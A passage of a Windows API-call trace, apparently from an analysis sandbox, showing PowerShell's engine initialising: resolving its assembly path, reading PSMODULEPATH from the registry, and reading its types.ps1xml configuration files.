	[0622.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.735] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0622.735] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0622.735] CoTaskMemFree (pv=0x44bd30) 
	[0622.737] CoTaskMemAlloc (cb=0xcc) returned 0x1ba43970
	[0622.737] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1ba43970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0622.737] CoTaskMemFree (pv=0x1ba43970) 
	[0622.737] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d6c8 | out: phkResult=0x26d6c8*=0x2ec) returned 0x0
	[0622.737] RegQueryValueExW (in: hKey=0x2ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d64c, lpData=0x0, lpcbData=0x26d648*=0x0 | out: lpType=0x26d64c*=0x2, lpData=0x0, lpcbData=0x26d648*=0x6c) returned 0x0
	[0622.737] CoTaskMemAlloc (cb=0x70) returned 0x3d0500
	[0622.737] RegQueryValueExW (in: hKey=0x2ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d61c, lpData=0x3d0500, lpcbData=0x26d618*=0x6c | out: lpType=0x26d61c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x26d618*=0x6c) returned 0x0
	[0622.737] CoTaskMemFree (pv=0x3d0500) 
	[0622.737] CoTaskMemAlloc (cb=0xcc) returned 0x1ba43970
	[0622.737] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1ba43970, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0622.737] CoTaskMemFree (pv=0x1ba43970) 
	[0622.737] CoTaskMemAlloc (cb=0xcc) returned 0x1ba43970
	[0622.738] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1ba43970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0622.738] CoTaskMemFree (pv=0x1ba43970) 
	[0623.727] RegCloseKey (hKey=0x2ec) returned 0x0
	[0623.728] CoTaskMemAlloc (cb=0xcc) returned 0x1ba43970
	[0623.728] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1ba43970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0623.728] CoTaskMemFree (pv=0x1ba43970) 
	[0623.728] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d6c8 | out: phkResult=0x26d6c8*=0x2ec) returned 0x0
	[0623.728] RegQueryValueExW (in: hKey=0x2ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d64c, lpData=0x0, lpcbData=0x26d648*=0x0 | out: lpType=0x26d64c*=0x0, lpData=0x0, lpcbData=0x26d648*=0x0) returned 0x2
	[0623.728] RegCloseKey (hKey=0x2ec) returned 0x0
	[0623.734] CoTaskMemAlloc (cb=0x20c) returned 0x430f70
	[0623.734] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x430f70 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0623.735] CoTaskMemFree (pv=0x430f70) 
	[0623.735] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0623.736] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0623.747] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0623.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.747] CoTaskMemFree (pv=0x44bd30) 
	[0623.750] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0623.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.750] CoTaskMemFree (pv=0x44bd30) 
	[0623.755] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0623.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.755] CoTaskMemFree (pv=0x44bd30) 
	[0623.755] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0623.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.756] CoTaskMemFree (pv=0x44bd30) 
	[0623.757] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x324) returned 0x0
	[0623.758] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x26d4cc, lpData=0x0, lpcbData=0x26d4c8*=0x0 | out: lpType=0x26d4cc*=0x1, lpData=0x0, lpcbData=0x26d4c8*=0x74) returned 0x0
	[0623.758] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x26d43c, lpData=0x0, lpcbData=0x26d438*=0x0 | out: lpType=0x26d43c*=0x1, lpData=0x0, lpcbData=0x26d438*=0x74) returned 0x0
	[0623.758] CoTaskMemAlloc (cb=0x78) returned 0x3d0500
	[0623.758] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x26d40c, lpData=0x3d0500, lpcbData=0x26d408*=0x74 | out: lpType=0x26d40c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d408*=0x74) returned 0x0
	[0623.759] CoTaskMemFree (pv=0x3d0500) 
	[0623.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0623.759] SetErrorMode (uMode=0x1) returned 0x1
	[0623.759] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d390 | out: lpFileInformation=0x26d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0623.759] SetErrorMode (uMode=0x1) returned 0x1
	[0623.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0623.762] SetErrorMode (uMode=0x1) returned 0x1
	[0623.762] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d390 | out: lpFileInformation=0x26d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0623.762] SetErrorMode (uMode=0x1) returned 0x1
	[0623.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0623.766] SetErrorMode (uMode=0x1) returned 0x1
	[0623.766] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d390 | out: lpFileInformation=0x26d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0623.766] SetErrorMode (uMode=0x1) returned 0x1
	[0624.859] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0624.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.859] CoTaskMemFree (pv=0x44bd30) 
	[0624.867] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0624.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.868] CoTaskMemFree (pv=0x44bd30) 
	[0624.869] GetACP () returned 0x4e4
	[0624.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0624.886] SetErrorMode (uMode=0x1) returned 0x1
	[0624.887] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0624.887] GetFileType (hFile=0x328) returned 0x1
	[0624.887] SetErrorMode (uMode=0x1) returned 0x1
	[0624.887] GetFileType (hFile=0x328) returned 0x1
	[0624.888] ReadFile (in: hFile=0x328, lpBuffer=0x2ea88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ea88a0*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.784] ReadFile (in: hFile=0x328, lpBuffer=0x2ea88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ea88a0*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.786] ReadFile (in: hFile=0x328, lpBuffer=0x2ea88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ea88a0*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.787] ReadFile (in: hFile=0x328, lpBuffer=0x2ea88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ea88a0*, lpNumberOfBytesRead=0x26d2c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0625.787] ReadFile (in: hFile=0x328, lpBuffer=0x2ea7cfb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ea7cfb*, lpNumberOfBytesRead=0x26d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0625.787] ReadFile (in: hFile=0x328, lpBuffer=0x2ea88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ea88a0*, lpNumberOfBytesRead=0x26d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0625.793] CloseHandle (hObject=0x328) returned 1
	[0625.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0625.798] SetErrorMode (uMode=0x1) returned 0x1
	[0625.798] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d240 | out: lpFileInformation=0x26d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0625.798] SetErrorMode (uMode=0x1) returned 0x1
	[0625.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0625.800] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d328 | out: phkResult=0x26d328*=0x328) returned 0x0
	[0625.801] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d2ac, lpData=0x0, lpcbData=0x26d2a8*=0x0 | out: lpType=0x26d2ac*=0x1, lpData=0x0, lpcbData=0x26d2a8*=0x56) returned 0x0
	[0625.801] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35890
	[0625.801] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d27c, lpData=0x1ba35890, lpcbData=0x26d278*=0x56 | out: lpType=0x26d27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d278*=0x56) returned 0x0
	[0625.801] CoTaskMemFree (pv=0x1ba35890) 
	[0625.801] RegCloseKey (hKey=0x328) returned 0x0
	[0625.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0625.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0627.292] VirtualQuery (in: lpAddress=0x26c010, lpBuffer=0x26ced0, dwLength=0x30 | out: lpBuffer=0x26ced0*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0627.302] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0627.302] GetFileType (hFile=0x324) returned 0x1
	[0627.302] SetErrorMode (uMode=0x1) returned 0x1
	[0627.302] GetFileType (hFile=0x324) returned 0x1
	[0627.303] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.318] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.322] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.323] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.323] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.323] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.323] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.324] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.324] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.326] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.327] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.327] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.328] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.328] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.328] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.329] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.329] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.333] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.333] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.334] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.334] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
